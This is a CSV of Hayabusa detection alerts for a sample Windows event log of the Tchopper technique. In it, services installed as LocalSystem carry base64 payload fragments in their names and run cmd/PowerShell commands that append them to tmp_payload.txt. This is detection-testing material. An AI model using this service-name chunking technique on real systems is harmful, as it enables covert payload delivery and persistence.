2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
